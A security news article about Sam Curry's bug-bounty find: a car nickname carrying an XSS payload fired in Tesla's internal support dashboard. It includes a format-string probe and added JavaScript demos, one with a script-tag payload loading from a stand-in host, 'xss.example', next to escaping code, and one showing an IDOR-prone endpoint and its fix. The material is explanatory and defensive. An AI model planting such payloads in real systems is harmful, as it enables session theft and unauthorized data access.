The Expert's View with Jeremy Kirk


How a Big Rock Revealed a Tesla XSS Vulnerability

Bug Hunter Sam Curry's Find Left Tesla Slightly Red-Faced
A Tesla Model 3 (Photo: Tesla)

Software vulnerabilities sometimes have an uncanny knack of revealing themselves, even when a bug hunter is looking someplace else.


Sam Curry's find wouldn't have been revealed except for an unfortunate circumstance: A big rock cracked the windshield of his black Tesla Model 3 while he was driving through Colorado. The rock, however, eventually led to Curry collecting a $10,000 bug bounty from the electric car company.


Curry, a 19-year-old who runs a web application security consultancy called 17security LLC near Omaha, Nebraska, had been trying to hack his Tesla Model 3 for a few months. He focuses on finding bugs for bounties.


When he eventually found a bug, Tesla's security team responded immediately to his report and quickly fixed the problem.

"Their security team was absolutely fantastic," Curry tells me. "I think they were almost embarrassed when I reported this because the way they reacted to this was 'Aw jeez.'"

What's in a Name? XSS

Curry writes in a blog post that he'd been trying to find a flaw within Tesla's in-car web browser, which is a pared-down version of Google's Chromium.

Then in April, he experimented with naming his Tesla. Owners can assign their car a nickname, which is displayed in the mobile app. Curry set his car's name to "%x.%x.%x.%x."

That string is a classic format string probe. If an application passes user-supplied text straight to a printf-style function as the format argument, each "%x" is interpreted as a directive and prints values from the stack instead of being treated as literal text, which can leak memory contents or crash the process. At one time, BMW's 2011 330i was vulnerable to this kind of attack, which could remotely crash the multimedia software due to an issue with its Bluetooth stack, designated CVE-2017-9212.

But the naming approach didn't work. So he decided to change the car's name to a cross-site scripting payload that came from XSS Hunter, a tool for finding these types of vulnerabilities.

Curry changed his car's name to an XSS payload. (Source: Sam Curry)
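To show why a nickname stored through the mobile app can fire much later in a completely different application, here is an added example (not code from Curry's post or from Tesla) of a stored, "blind" XSS sink: a support dashboard that builds HTML from the vehicle record by string concatenation, beside a version that escapes the name first. The vehicle record, the VIN, the dashboard markup and the callback host "xss.example" are all constructed for the demo; the payload only mimics the shape of an XSS Hunter probe (a script tag that loads from a host the tester controls), it is not the real XSS Hunter payload.

```javascript
// Added example, not Tesla's code or Sam Curry's: a stored XSS sink in a
// support dashboard, vulnerable and hardened. All data below is constructed.

const CALLBACK_HOST = "xss.example"; // hypothetical tester-controlled host

// Constructed vehicle record, as an owner could store it from the mobile app.
// The nickname breaks out of an attribute and loads a remote script.
const vehicle = {
  vin: "5YJ3E1EA0KF000000", // constructed, not a real VIN
  name: `"><script src=https://${CALLBACK_HOST}></script>`,
  speedMph: 81,
};

// Vulnerable sink: the nickname lands unescaped in an attribute and in a
// text node. A browser would execute the injected <script> when a support
// rep opens the page, which is the "payload fires" moment in the story.
function renderDashboardVulnerable(v) {
  return `<div class="vehicle" data-name="${v.name}">` +
         `<h2>${v.name}</h2><span>${v.speedMph} mph</span></div>`;
}

// Hardened sink: HTML-escape every untrusted value before it reaches markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderDashboardSafe(v) {
  const name = escapeHtml(v.name);
  return `<div class="vehicle" data-name="${name}">` +
         `<h2>${name}</h2><span>${escapeHtml(v.speedMph)} mph</span></div>`;
}

// Demo-only check: did a live <script> element pointing at the callback host
// survive rendering? This is not a general XSS detector, it only confirms
// whether this particular payload is still active markup.
function containsActiveScript(html, host) {
  return html.includes(`<script src=https://${host}>`);
}

// Stand-alone run: the vulnerable render keeps the script, the safe one
// turns it into inert text.
console.log(containsActiveScript(renderDashboardVulnerable(vehicle), CALLBACK_HOST)); // true
console.log(containsActiveScript(renderDashboardSafe(vehicle), CALLBACK_HOST));       // false
```

The point of the escaping function is that the defense lives at the sink, not at the input: the nickname was accepted months earlier by a different system, so any dashboard that renders it has to treat it as untrusted.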

Nothing happened, or at least not right away. Curry says he had a month of free time earlier this year and decided to drive across the U.S.

"I went on this super long - probably like 70 hours of driving - road trip," he says. "We were driving through Colorado and this rock just cracked my windshield. I was pretty bummed out."

He filed a support note through Tesla's mobile app, which connects to the car, and resumed his trip.

Payload Fires

The support request, carrying his unorthodox car name, caused the XSS payload to fire on the domain "garage.vn.teslamotors.com." Bingo. On Tesla's end, a support rep had just pulled up the live diagnostics from Curry's car on a support dashboard, and the rep's browser executed the script stored in the nickname.

XSS Hunter sent an email notification with the URL of the vulnerable page as well as a screenshot, which showed the dashboard that had diagnostic information on the state of Curry's vehicle. The URL contained part of his car's VIN. If the endpoint did not check that the caller was entitled to see that vehicle, the identifier could simply be incremented to reach other cars' data, an insecure direct object reference flaw (see Security Flaw Exposed Valid Airline Boarding Passes).

Curry's XSS script triggered when a Tesla support rep responded to his support request. (Source: Sam Curry)

Although Curry says he didn't take it that far, he writes in his post that "it is likely that by incrementing the ID sent to the vitals endpoint, an attacker could pull and modify information about other cars. If I were an attacker attempting to compromise this, I'd probably have to submit a few support requests, but I'd eventually be able to learn enough about their environment via viewing the DOM and JavaScript to forge a request to do exactly what I'd want to do."
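Curry's point about incrementing the ID is the textbook insecure direct object reference. As an added example (not Tesla's code and not something Curry tested), here is a hypothetical "vitals" lookup that trusts the id in the URL, next to one that also requires the caller to be the vehicle's owner or a support rep working an open case on that vehicle. The sequential ids, VINs, user names, roles and case records are constructed for the demo.

```javascript
// Added example, not Tesla's code: an IDOR on a vitals endpoint and the
// authorization check that closes it. Every record here is constructed.

// Sequential vehicle ids are exactly the kind an attacker can increment.
const VITALS = new Map([
  [1001, { vin: "5YJ3E1EA0KF000001", owner: "alice", speedMph: 81, batteryPct: 62 }],
  [1002, { vin: "5YJ3E1EA0KF000002", owner: "bob",   speedMph: 0,  batteryPct: 90 }],
]);

// Open support cases: which vehicle each case concerns and which rep has it.
const CASES = new Map([
  ["case-77", { vehicleId: 1001, assignedTo: "rep-1" }],
]);

// Vulnerable handler: the only "check" is whether the id exists, so anyone
// who can reach the endpoint can walk the id space.
function getVitalsVulnerable(req) {
  const v = VITALS.get(Number(req.params.id));
  return v ? { status: 200, body: v } : { status: 404 };
}

// Hardened handler: authenticate, then authorize against the object itself.
// Unknown ids and unauthorized ids both get 403 so existence is not leaked,
// and the response is a minimal view rather than the raw record.
function getVitalsSafe(req) {
  const user = req.session && req.session.user;
  if (!user) return { status: 401 };
  const id = Number(req.params.id);
  const v = VITALS.get(id);
  const isOwner = !!v && user.role === "owner" && v.owner === user.name;
  const isAssignedRep = user.role === "support" &&
    [...CASES.values()].some((c) => c.vehicleId === id && c.assignedTo === user.name);
  if (!v || !(isOwner || isAssignedRep)) return { status: 403 };
  return { status: 200, body: { vin: v.vin, speedMph: v.speedMph, batteryPct: v.batteryPct } };
}

// Stand-alone run: a support rep working case-77 can read 1001 but not 1002,
// while the vulnerable handler hands out 1002 to anyone.
const repSession = { user: { name: "rep-1", role: "support" } };
console.log(getVitalsVulnerable({ params: { id: "1002" } }).status);                  // 200
console.log(getVitalsSafe({ params: { id: "1001" }, session: repSession }).status);   // 200
console.log(getVitalsSafe({ params: { id: "1002" }, session: repSession }).status);   // 403
```

The check generalizes beyond support dashboards: any endpoint keyed by a guessable identifier needs a per-object authorization decision, because the identifier itself proves nothing about who is asking.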

Curry says the dashboard application also has a public version, but what he saw was a screenshot of the internal one. He thinks it may have been possible to pull a session cookie from the internal dashboard and use it against the public version, which may have allowed him to interact with any vehicle. Support representatives also use the dashboard to push software updates to Teslas.

"You could have pretty much pulled live information from any vehicle in that panel," he says.

Tesla triaged the bug and released a hot fix within 12 hours, he writes. Tesla paid Curry a $10,000 bounty in about two weeks.

Speed Demon?

One question remains, however. Curry posted the screenshot of his vehicle's diagnostic information that was sent to him by XSS Hunter.

His speed at 3:09 p.m. on June 19 was 81 mph. Hmm.

Diagnostic data showing the status of Curry's Tesla when the company addressed his support request. (Source: Sam Curry)

I asked Curry where he was in Colorado. He told me: "Somewhere where the speed limit's 81 mph. One of those big highways. I was on the autobahn."



About the Author

Jeremy Kirk


Managing Editor, Security and Technology, ISMG

Kirk is a veteran journalist who has reported from more than a dozen countries. Based in Sydney, he is Managing Editor for Security and Technology for Information Security Media Group. Prior to ISMG, he worked from London and Sydney covering computer security and privacy for International Data Group. Further back, he covered military affairs from Seoul, South Korea, and general assignment news for his hometown paper in Illinois.



